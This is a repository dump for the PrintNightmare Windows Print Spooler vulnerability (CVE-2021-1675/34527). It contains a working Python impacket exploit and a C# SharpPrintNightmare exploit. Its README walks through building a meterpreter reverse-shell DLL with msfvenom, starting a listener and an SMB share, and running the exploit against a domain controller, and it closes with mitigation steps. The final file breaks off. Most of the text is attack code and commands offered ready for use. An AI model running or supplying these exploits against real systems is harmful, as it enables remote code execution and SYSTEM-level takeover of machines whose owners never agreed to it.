├── CVE-2021-1675.py
├── README.md
└── SharpPringtNightmare
    ├── SharpPrintNightmare-Exploit
    └── SharpPrintNightmare
        ├── App.config
        ├── Program.cs
        ├── Properties
            └── AssemblyInfo.cs
        ├── SharpPrintNightmare.csproj
        ├── SharpPrintNightmare.sln
        ├── Tools.cs
        └── obj
            └── Release
                └── SharpPrintNightmare.csproj.FileListAbsolute.txt


/CVE-2021-1675.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3
  2 | from impacket.dcerpc.v5 import rprn
  3 | from impacket.dcerpc.v5 import transport
  4 | from impacket.dcerpc.v5.dtypes import NULL
  5 | from impacket.structure import Structure
  6 | import argparse
  7 | import sys
  8 | import pathlib
  9 | 
 10 | #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
 11 | class DRIVER_INFO_2_BLOB(Structure):
 12 |     structure = (
 13 |         ('cVersion','<L'),
 14 |         ('NameOffset', '<L'),
 15 |         ('EnvironmentOffset', '<L'),
 16 |         ('DriverPathOffset', '<L'),
 17 |         ('DataFileOffset', '<L'),
 18 |         ('ConfigFileOffset', '<L'),
 19 |     )
 20 | 
 21 |     def __init__(self, data = None):
 22 |         Structure.__init__(self, data = data)
 23 |     
 24 |     def fromString(self, data, offset=0):
 25 |         Structure.fromString(self, data)
 26 |         self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']+offset:self['DataFileOffset']+offset].decode('utf-16-le')
 27 |         self['DataFileArray'] = self.rawData[self['DataFileOffset']+offset:self['DriverPathOffset']+offset].decode('utf-16-le')
 28 |         self['DriverPathArray'] = self.rawData[self['DriverPathOffset']+offset:self['EnvironmentOffset']+offset].decode('utf-16-le')
 29 |         self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']+offset:self['NameOffset']+offset].decode('utf-16-le')
 30 |         #self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')
 31 | 
 32 | class DRIVER_INFO_2_ARRAY(Structure):
 33 |     def __init__(self, data = None, pcReturned = None):
 34 |         Structure.__init__(self, data = data)
 35 |         self['drivers'] = list()
 36 |         remaining = data
 37 |         if data is not None:
 38 |             for i in range(pcReturned):
 39 |                 attr = DRIVER_INFO_2_BLOB(remaining)
 40 |                 self['drivers'].append(attr)
 41 |                 remaining = remaining[len(attr):]
 42 | 
 43 | def connect(username, password, domain, lmhash, nthash, address, port):
 44 |     binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
 45 |     rpctransport = transport.DCERPCTransportFactory(binding)
 46 |     
 47 |     rpctransport.set_dport(port)
 48 |     rpctransport.setRemoteHost(address)
 49 |     
 50 |     if hasattr(rpctransport, 'set_credentials'):
 51 |         # This method exists only for selected protocol sequences.
 52 |         rpctransport.set_credentials(username, password, domain, lmhash, nthash)
 53 |     
 54 |     print("[*] Connecting to {0}".format(binding))
 55 |     try:
 56 |         dce = rpctransport.get_dce_rpc()
 57 |         dce.connect()
 58 |         dce.bind(rprn.MSRPC_UUID_RPRN)
 59 |     except:
 60 |         print("[-] Connection Failed")
 61 |         sys.exit(1)
 62 |     print("[+] Bind OK")
 63 |     return dce
 64 | 
 65 | 
 66 | def getDriver(dce, handle=NULL):
 67 |     #get drivers
 68 |     resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
 69 |     blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
 70 |     for i in blobs['drivers']:
 71 |         if "filerepository" in i['DriverPathArray'].lower():
 72 |             return i
 73 |     
 74 |     print("[-] Failed to find driver")
 75 |     sys.exit(1)
 76 | 
 77 | 
 78 | def main(dce, pDriverPath, share, handle=NULL):
 79 |     #build DRIVER_CONTAINER package
 80 |     container_info = rprn.DRIVER_CONTAINER()
 81 |     container_info['Level'] = 2
 82 |     container_info['DriverInfo']['tag'] = 2
 83 |     container_info['DriverInfo']['Level2']['cVersion']     = 3
 84 |     container_info['DriverInfo']['Level2']['pName']        = "1234\x00"
 85 |     container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
 86 |     container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
 87 |     container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
 88 |     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\winhttp.dll\x00"
 89 |     
 90 |     flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
 91 |     filename = share.split("\\")[-1]
 92 | 
 93 |     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
 94 |     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 95 | 
 96 |     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
 97 |     for i in range(1, 30):
 98 |         try:
 99 |             container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
100 |             resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
101 |             print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
102 |             if (resp['ErrorCode'] == 0):
103 |                 print("[+] Exploit Completed")
104 |                 sys.exit()
105 |         except Exception as e:
106 |             #print(e)
107 |             pass
108 | 
109 | 
110 | if __name__ == '__main__':
111 |     parser = argparse.ArgumentParser(add_help = True, description = "MS-RPRN PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
112 | Example;
113 | ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
114 | ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
115 |     """)
116 |     parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
117 |     parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
118 |     parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
119 |     group = parser.add_argument_group('authentication')
120 |     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
121 |     group = parser.add_argument_group('connection')
122 |     group.add_argument('-target-ip', action='store', metavar="ip address",
123 |                        help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
124 |                             'This is useful when target is the NetBIOS name and you cannot resolve it')
125 |     group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
126 |                        help='Destination port to connect to SMB Server')
127 | 
128 |     if len(sys.argv)==1:
129 |         parser.print_help()
130 |         sys.exit(1)
131 | 
132 |     options = parser.parse_args()
133 | 
134 |     import re
135 |     domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
136 |         options.target).groups('')
137 | 
138 |     #In case the password contains '@'
139 |     if '@' in address:
140 |         password = password + '@' + address.rpartition('@')[0]
141 |         address = address.rpartition('@')[2]
142 | 
143 |     if options.target_ip is None:
144 |         options.target_ip = address
145 | 
146 |     if domain is None:
147 |         domain = ''
148 | 
149 |     if password == '' and username != '' and options.hashes is None:
150 |         from getpass import getpass
151 |         password = getpass("Password:")
152 | 
153 |     if options.hashes is not None:
154 |         lmhash, nthash = options.hashes.split(':')
155 |     else:
156 |         lmhash = ''
157 |         nthash = ''
158 | 
159 |     #connect
160 |     dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port)
161 |     #handle = "\\\\{0}\x00".format(address)
162 |     handle = NULL
163 | 
164 |     #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
165 |     if not options.pDriverPath:
166 |         try:
167 |             blob = getDriver(dce, handle)
168 |             pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
169 |             if not "FileRepository" in pDriverPath:
170 |                 print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
171 |                 print("[-] Specify pDriverPath manually")
172 |                 sys.exit(1)
173 |         except Exception as e:
174 |             print('[-] Failed to enumerate remote pDriverPath')
175 |             print(str(e))
176 |             sys.exit(1)
177 |     else:
178 |         pDriverPath = options.pDriverPath
179 | 
180 |     if "\\\\" in options.share:
181 |         options.share = options.share.replace("\\\\","\\??\\UNC\\")
182 | 
183 |     print("[+] pDriverPath Found {0}".format(pDriverPath))
184 |     print("[*] Executing {0}".format(options.share))
185 | 
186 |     #re-run if stage0/stageX fails
187 |     print("[*] Try 1...")
188 |     main(dce, pDriverPath, options.share)
189 |     print("[*] Try 2...")
190 |     main(dce, pDriverPath, options.share)
191 |     print("[*] Try 3...")
192 |     main(dce, pDriverPath, options.share)
193 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # PrintNightmare-Windows Print Spooler RCE/LPE Vulnerability(CVE-2021-34527, CVE-2021-1675)
  2 | 
  3 | 
  4 | ABOUT THE WINDOWS PRINT SPOOLER
  5 | 
  6 | A printer spooler is an application which manages the paper printing jobs sent from a computer to a printer and also this service allows the system to act as print clients or print servers. It’s a definite to have a print spooler service on the computer to connect to a printer and main disadvantage of this service is that its enabled by default runs within the SYSTEM context so attackers could easily exploit this service to gain privileged access on the system.This attack is mainly used in domain controllers for printer pruning. In a domain controller printers are objects and the pruning process by which printers that are published but which are no longer available on the network are removed from the AD to prevent users from trying to print to non-existent printers, basically the printer pruning eliminates the issue for the users reaching out to a non-existent printer.
  7 | 
  8 | This vulnerability exists due to an authorisation bypass bug in the Print Spooler service **spoolsv.exe** on Windows systems, which allows authenticated remote users to install print drivers using the RPC call **RpcAddPrinterDriver** and specify a driver file located on a remote location. 
  9 | 
 10 | For this vulnerability there are 2 Types of CVE’s one is for LPE and the other is for RCE but recently the exploit which was for LPE was rename for a RCE exploit which is CVE-2021–1675.
 11 | 
 12 | 1.CVE-2021–1675 → This exploit successfully works on both the attack vectors LPE and RCE. At first Microsoft has classified this CVE as LPE but later on they have changed into RemoteCodeExecution. As for your knowledge the LPE exploit is named as “SharpPrintNightmare”
 13 | 
 14 | 2.CVE-2021–34527 → Using this exploit the attackers could remotely inject the malicious DLL file by hosting the DLL file on a SMB server.
 15 | 
 16 | 
 17 | HOW TO EXPLOIT THE VULNERABILITY REMOTELY
 18 | 
 19 | When an attacker tries to exploit the print spooler remotely To verify whether a host is vulnerable for the printnightmare flaw we could use a tool named “rpcdump.py”
 20 | 
 21 | ```
 22 | ┌──(root㉿snowdox)-[/home/snowdox]
 23 | └─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
 24 | Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
 25 | Protocol: [MS-RPRN]: Print System Remote Protocol
 26 | ```
 27 | 
 28 | EXPLOITATION
 29 | 
 30 | In order to exploit this vulnerability, the delivery method of this exploit is a malicious DLL. This method is also called as a ‘File-less’ exploitation which helps us to bypass most of the protections on the system, such as the antivirus software. In this attack I am gonna trick the print spooler service to install a new driver from an UNC path and load the driver but in our case it’s the malicious DLL and this would give us a reverse shell to our attacker machine. To create our malicious DLL I’ll be using ‘msfvenom’ and since our architecture is a windows 64 bit machine I’ll be embedding a Windows x64 payload to the DLL, providing the LocalHost and the LocalPort which we are gonna start a listener for a callback from the DLL. You can find your IP address of the machine by typing “ifconfig”On a later article I’ll explain you’ll on how to create a DLL using C++ which could be used to add a user to the Windows System and login using the provided credentials if ‘WinRM’ port is open, but for now let’s stick to msfvenom. Use the below command to create your malicious DLL.
 31 | 
 32 | ```
 33 | ┌──(root㉿snowdox)-[/home/snowdox]
 34 | └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.103.254 LPORT=9000 -f dll -o /home/snowdox/RedTeam/Print/Print_Mal.dll
 35 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
 36 | [-] No arch selected, selecting arch: x64 from the payload
 37 | No encoder specified, outputting raw payload
 38 | Payload size: 510 bytes
 39 | Final size of dll file: 8704 bytes
 40 | Saved as: /home/snowdox/RedTeam/Print/Print_Mal.dll
 41 | 
 42 | As we have created our malicious DLL, next we have to start our Listener on the “Metasploit Framework” to get the ‘Meterpreter’ shell back when the DLL is executed on the system. To start the Listener follow the below steps. In the end type ‘exploit -j’ to start the listener in the background.
 43 | 
 44 | msf6 > use exploit/multi/handler
 45 | [*] Using configured payload generic/shell_reverse_tcp
 46 | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
 47 | payload => windows/x64/meterpreter/reverse_tcp
 48 | msf6 exploit(multi/handler) > set LHOST tun0
 49 | LHOST => tun0
 50 | msf6 exploit(multi/handler) > set LPORT 9000
 51 | LPORT => 9000
 52 | msf6 exploit(multi/handler) > exploit -j
 53 | [*] Exploit running as background job 0.
 54 | [*] Exploit completed, but no session was created.
 55 | 
 56 | [*] Started reverse TCP handler on 10.18.103.254:9000
 57 | msf6 exploit(multi/handler) >
 58 | 
 59 | ```
 60 | 
 61 | Now we have started our listener, let’s start our SMB server to host our malicious DLL file. Go to the system path where you have saved your DLL and enter the below command to start the SMB server, but before that make sure you have installed ‘Impacket’ on the machine. Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. To start the ‘smbserver.py’ script to host our malicious DLL enter the command below within the file directory where you have stored the DLL.
 62 | 
 63 | ```
 64 | ┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
 65 | └─# smbserver.py share . -smb2support
 66 | Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
 67 | 
 68 | [*] Config file parsed
 69 | [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
 70 | [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
 71 | [*] Config file parsed
 72 | [*] Config file parsed
 73 | [*] Config file parsed
 74 | 
 75 | ```
 76 | 
 77 | 
 78 | Cool, now we have already set up everything you could start the exploitation process using the
 79 | 
 80 | CVE-2021–1675 POC by providing the domain controller and user credentials with the UNC path for the hosted malicious DLL on our system.
 81 | 
 82 | ```
 83 | ┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
 84 | └─# python CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\\\10.18.103.254\\share\\Print_Mal.dll'
 85 | [*] Connecting to ncacn_np:10.10.220.93[\\PIPE\\spoolss]
 86 | [+] Bind OK
 87 | [+] pDriverPath Found C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL
 88 | [*] Executing \\??\\UNC\\10.18.103.254\\share\\Print_Mal.dll
 89 | [*] Try 1...
 90 | [*] Stage0: 0
 91 | [*] Try 2...
 92 | [*] Stage0: 0
 93 | [*] Try 3...
 94 | 
 95 | ```
 96 | 
 97 | After few seconds running the exploit script, if we go back to the listener we started in ‘Metasploit’ it shows that it has opened a ‘Meterpreter’ session so that now we could interact with victim machine using the ‘Meterpreter shell’.
 98 | 
 99 | 
100 | ## THE USAGE OF THE EXPLOIT (CVE-2021-1675)
101 | 
102 | ```
103 | usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
104 | 
105 | CVE-2021-1675/34527 implementation.
106 | 
107 | positional arguments:
108 |   target                [[domain/]username[:password]@]<targetName or address>
109 |   share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'
110 | 
111 | optional arguments:
112 |   -h, --help            show this help message and exit
113 | 
114 | authentication:
115 |   -hashes LMHASH:NTHASH
116 |                         NTLM hashes, format is LMHASH:NTHASH
117 | 
118 | connection:
119 |   -target-ip ip address
120 |                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
121 |                         and you cannot resolve it
122 |   -port [destination port]
123 |                         Destination port to connect to SMB Server
124 | 
125 | Example;
126 | ./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\snowdox.dll'
127 | ./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 'C:\snowdox.dll'
128 | ```
129 | 
130 | ## SHARP-PRINTNIGHTMARE EXPLOIT
131 | 
132 | The SharpPrintNightmare/ directory contains the C# Implementation of the Printnightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675), as well as Remote Code Execution (RCE). The RCE functionality requires execution with local admin privileges on the machine running the exploit.
133 | 
134 | ```
135 | #LPE
136 | C:\SharpPrintNightmare.exe C:\snowdox.dll
137 | 
138 | #RCE using existing context
139 | SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\10.19.1.15'
140 | 
141 | #RCE using runas /netonly
142 | SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password
143 | 
144 | ```
145 | 
146 | MITIGATION
147 | 
148 | METHOD 1-:
149 | 
150 | DISABLING PRINT SPOOLER SERVICE USING POWERSHELL
151 | 
152 | To protect your infrastructure against the PrintNightmare Vulnerability you need to first identify the service in your infrastructure in this case it’s you “Active Directory”. Using the following Powershell CMDlet identify the PrintSpooler Service.
153 | 
154 | PS C:\\Users\\Nathaneal> Get-Service -Name Spooler
155 | Status     Name            DisplayName
156 | ------    ------          -------------
157 | Running   Spooler          Print Spooler
158 | From the above result you can see that the System has a running “Print Spooler” Service. Next if your organisation is fine with disabling this Service we could use powershell to disable the Print Spooler service.
159 | ```
160 | PS C:\\Users\\Nathaneal> Stop-Service -Name Spooler -Force
161 | ```
162 | This command will disable the service currently in the system or the Active Direcotry which it’s connected to.
163 | 
164 | ```
165 | PS C:\\Users\\Nathaneal> Set-Service -Name Spooler -StartUpType disabled
166 | ```
167 | This command will make sure that this service is not started on reboot of the system. After disabling the service completly you could use “rpcdump.py” tool to confirm that the system is not vulnerable for the PrintNightmare exploit
168 | 
169 | ```
170 | ┌──(root㉿snowdox)-[/home/snowdox]
171 | └─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
172 | ```
173 | After executing the above command the service is no longer shown and the both the exploits doesn’t work on the system(RCE and LPE).
174 | 
175 | METHOD 2-: 
176 | 
177 | ## DISABLING INBOUND REMOTE PRINTING THROUGH GROUP POLICY
178 | 
179 | You can also configure the settings via Group Policy as follows -:
180 | 
181 | ```
182 | Computer Configuration / Administrative Templates / Printers
183 | ```
184 | Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.
185 | 
186 | This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.
187 | 
188 | 
189 | 
190 | 
191 | 
192 | 
193 | 
194 | 
195 | 


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare-Exploit:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.ComponentModel;
  3 | using System.IO;
  4 | using System.Runtime.InteropServices;
  5 | using Tools;
  6 | 
  7 | namespace SharpPrintNightmare
  8 | {
  9 |     class Program
 10 |     {
 11 |         [DllImport("kernel32.dll")]
 12 |         static extern uint GetLastError();
 13 | 
 14 |         [DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
 15 |         public static extern bool AddPrinterDriverEx([Optional] string pName, uint Level, [In, Out] IntPtr pDriverInfo, uint dwFileCopyFlags);
 16 | 
 17 |         //https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html
 18 |         [DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
 19 |         static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned);
 20 |         public struct DRIVER_INFO_2
 21 |         {
 22 |             public uint cVersion;
 23 |             [MarshalAs(UnmanagedType.LPTStr)]
 24 |             public string pName;
 25 |             [MarshalAs(UnmanagedType.LPTStr)]
 26 |             public string pEnvironment;
 27 |             [MarshalAs(UnmanagedType.LPTStr)]
 28 |             public string pDriverPath;
 29 |             [MarshalAs(UnmanagedType.LPTStr)]
 30 |             public string pDataFile;
 31 |             [MarshalAs(UnmanagedType.LPTStr)]
 32 |             public string pConfigFile;
 33 |         }
 34 | 
 35 |         // 3.1.4.4.8 RpcAddPrinterDriverEx Values
 36 |         public static uint APD_STRICT_UPGRADE = 0x00000001;
 37 |         public static uint APD_STRICT_DOWNGRADE = 0x00000002;
 38 |         public static uint APD_COPY_ALL_FILES = 0x00000004;
 39 |         public static uint APD_COPY_NEW_FILES = 0x00000008;
 40 |         public static uint APD_COPY_FROM_DIRECTORY = 0x00000010;
 41 |         public static uint APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000;
 42 |         public static uint APD_COPY_TO_ALL_SPOOLERS = 0x00002000;
 43 |         public static uint APD_INSTALL_WARNED_DRIVER = 0x00008000;
 44 |         public static uint APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000;
 45 | 
 46 |         static void Main(string[] args)
 47 |         {
 48 |             string dllpath;
 49 |             string pDriverPath = "";
 50 |             string path = null;
 51 |             //network credentials wont be used for LPE
 52 |             string domain = "NeverGonnaGiveYouUp";
 53 |             string user = "NeverGonnaLetYouDown";
 54 |             string password = "NeverGonnaRunAroundAndDesertYou";
 55 | 
 56 |             if (args == null || args.Length == 0)
 57 |             {
 58 |                 Console.WriteLine("-Locally");
 59 |                 Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll");
 60 |                 Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'");
 61 |                 Console.WriteLine("-Remote using current context");
 62 |                 Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll'  'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'");
 63 |                 Console.WriteLine("-Remote using runas");
 64 |                 Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll'  'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123");
 65 |                 Environment.Exit(0);
 66 |             }
 67 |             dllpath = args[0];
 68 |             
 69 |             if(args.Length > 1)
 70 |             {
 71 |                 pDriverPath = args[1];
 72 |             }
 73 |             else
 74 |             {
 75 |                 DRIVER_INFO_2[] drivers = getDrivers();
 76 |                 foreach (DRIVER_INFO_2 driver in drivers)
 77 |                 {
 78 |                     //Console.WriteLine(driver.pDriverPath); //debugcd 
 79 |                     if (driver.pDriverPath.ToLower().Contains("filerepository"))
 80 |                     {
 81 |                         pDriverPath = driver.pDriverPath;
 82 |                         break;
 83 |                     }
 84 |                 }
 85 |                 //could not find driver path
 86 |                 if (pDriverPath == "")
 87 |                 {
 88 |                     Console.WriteLine($"[-] pDriverPath {drivers[0].pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
 89 |                     Console.WriteLine($"[-] Specify pDriverPath manually");
 90 |                     Environment.Exit(1);
 91 |                 }
 92 |             }
 93 |             Console.WriteLine($"[*] pDriverPath {pDriverPath}");
 94 |             Console.WriteLine($"[*] Executing {dllpath}");
 95 | 
 96 |             if (args.Length > 2)
 97 |             {
 98 |                 path = args[2];
 99 |             }
100 |             if (args.Length > 3)
101 |             {
102 |                 domain = args[3];
103 |                 user = args[4];
104 |                 password = args[5];
105 |             }
106 |             
107 |             //runas /netonly
108 |             using (new Impersonator.Impersonation(domain, user, password))
109 |             {
110 |                 Console.WriteLine("[*] Try 1...");
111 |                 addPrinter(dllpath, pDriverPath, path);
112 |                 Console.WriteLine("[*] Try 2...");
113 |                 addPrinter(dllpath, pDriverPath, path);
114 |                 Console.WriteLine("[*] Try 3...");
115 |                 addPrinter(dllpath, pDriverPath, path);
116 |             }
117 |         }
118 | 
119 |         static void addPrinter(string dllpath, string pDriverPath, string path = null)
120 |         {
121 | 
122 |             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
123 |             //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
124 | 
125 |             //DRIVER_INFO_2 Level2 = drivers[0]; // debug
126 |             DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
127 |             Level2.cVersion = 3;
128 |             Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
129 |             Level2.pDataFile = dllpath;
130 |             Level2.pDriverPath = pDriverPath;
131 |             Level2.pEnvironment = "Windows x64";
132 |             Level2.pName = "12345";
133 | 
134 |             string filename = Path.GetFileName(dllpath);
135 |             uint flags = APD_COPY_ALL_FILES | 0x10 | 0x8000;
136 | 
137 |             //convert struct to unmanage code
138 |             IntPtr pnt = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
139 |             Marshal.StructureToPtr(Level2, pnt, false);
140 | 
141 |             //call AddPrinterDriverEx
142 |             AddPrinterDriverEx(path, 2, pnt, flags);
143 |             Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
144 |             Marshal.FreeHGlobal(pnt);
145 | 
146 |             //Dont ask me why this works
147 |             Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
148 |             for (int i = 1; i <= 30; i++)
149 |             {
150 |                 //add path to our exploit
151 |                 Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
152 |                 //convert struct to unmanage code
153 |                 IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
154 |                 Marshal.StructureToPtr(Level2, pnt2, false);
155 | 
156 |                 //call AddPrinterDriverEx
157 |                 AddPrinterDriverEx(path, 2, pnt2, flags);
158 |                 int errorcode = Marshal.GetLastWin32Error();
159 |                 Marshal.FreeHGlobal(pnt2);
160 |                 if (errorcode == 0)
161 |                 {
162 |                     Console.WriteLine($"[*] Stage {i}: " + errorcode);
163 |                     Console.WriteLine($"[+] Exploit Completed");
164 |                     Environment.Exit(0);
165 |                 }
166 |             }
167 |         }
168 | 
169 |         static DRIVER_INFO_2[] getDrivers(string path = null)
170 |         {
171 |             uint cbNeeded = 0;
172 |             uint cReturned = 0;
173 |             //path = "\\\\192.168.1.20";
174 |             
175 |             if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
176 |             {
177 |                 //succeeds, but shouldn't, because buffer is zero (too small)!
178 |                 throw new Exception("EnumPrinters should fail!");
179 |             }
180 | 
181 |             int lastWin32Error = Marshal.GetLastWin32Error();
182 |             //ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception
183 |             if (lastWin32Error != 122)
184 |             {
185 |                 throw new Win32Exception(lastWin32Error);
186 |             }
187 | 
188 |             IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
189 |             if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
190 |             {
191 |                 DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
192 |                 long offset;
193 |                 offset = pAddr.ToInt64();
194 |                 Type type = typeof(DRIVER_INFO_2);
195 |                 int increment = Marshal.SizeOf(type);
196 |                 for (int i = 0; i < cReturned; i++)
197 |                 {
198 |                     printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type);
199 |                     offset += increment;
200 |                 }
201 |                 Marshal.FreeHGlobal(pAddr);
202 |                 return printerInfo2;
203 |             }
204 | 
205 |             throw new Win32Exception(Marshal.GetLastWin32Error());
206 |         }
207 |     }
208 | }
209 | 


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | // General Information about an assembly is controlled through the following
